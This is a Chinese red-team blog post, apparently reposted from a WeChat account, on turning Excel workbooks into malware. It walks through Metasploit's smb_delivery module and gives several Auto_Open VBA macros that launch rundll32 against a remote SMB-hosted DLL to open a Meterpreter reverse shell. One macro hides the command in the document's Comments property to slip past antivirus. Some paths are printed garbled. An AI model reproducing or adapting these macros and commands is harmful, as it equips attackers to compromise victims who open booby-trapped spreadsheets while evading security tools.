红队技巧 | 武器化Excel

admin 2021年9月14日16:00:50评论202 views字数 974阅读3分14秒阅读模式

0x01 前言

通过Excel文件运行命令行以生成Meterpreter反向shell的不同方法,尝试使用这种方式来尝试Bypass_AV

0x02 SMB_Deliver Exploit

Metasploit SMB传递模块通过SMB服务器提供.dll有效负载,并执行生成的有效负载的命令。

Msfconsole:

use exploit/windows/smb/smb_delivery

红队技巧 | 武器化Excel执行exploit会自动设置meterpreter_reverse_tcp有效负载,以便在受害机器上打开Meterpreter反向 shell

红队技巧 | 武器化Excel我在我们的测试环境执行命令

rundll32.exe \192.168.190.128321.dll,0

红队技巧 | 武器化Excel
#爬坑: 在Win10上需要SMB2或更高版本的错误
http://www.ghost580.com/win10/2018-11-10/26476.html

红队技巧 | 武器化Excel反向shell成功执行

0x03 Excel 武器化

VBS 宏脚本

红队技巧 | 武器化ExcelCode:

Sub Auto_Open()
Call Shell("cmd.exe /c rundll32.exe \192.168.190.128321.dll,0", )
End Sub

发现简单的宏文件是无法绕过AV

在备注插入命令宏执行

红队技巧 | 武器化Excel在备注下插入命令行,宏文件代码Code:

Sub Auto_Open()
Dim prop As DocumentProperty
    For Each prop In ActiveWorkbook.BuiltinDocumentProperties
        If prop.Name = "Comments" Then
            Shell prop.Value
        End If
    Next
End Sub
红队技巧 | 武器化Excel
红队技巧 | 武器化Excel
自定义公式执行

为了运行命令行,我创建了一个适合我们的自定义公式

红队技巧 | 武器化Excel
自定义按钮内的 VBS 宏脚本

我在自定义按钮中插入了 VBS 宏脚本红队技巧 | 武器化ExcelCode:

Sub Auto_Open()
Call Shell("rundll32.exe \192.168.190.128321.dll,0", vbHide)
End Sub

红队技巧 | 武器化Excel保存为.xls文件然后打开发现可以反向Shell

红队技巧 | 武器化Excel
红队技巧 | 武器化Excel

0x04 结尾

单纯记录一下,大佬们不喜勿喷

红队技巧 | 武器化Excel


本文始发于微信公众号(不懂安全的校长):红队技巧 | 武器化Excel

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月14日16:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队技巧 | 武器化Excelhttp://cn-sec.com/archives/542351.html

发表评论

匿名网友 填写信息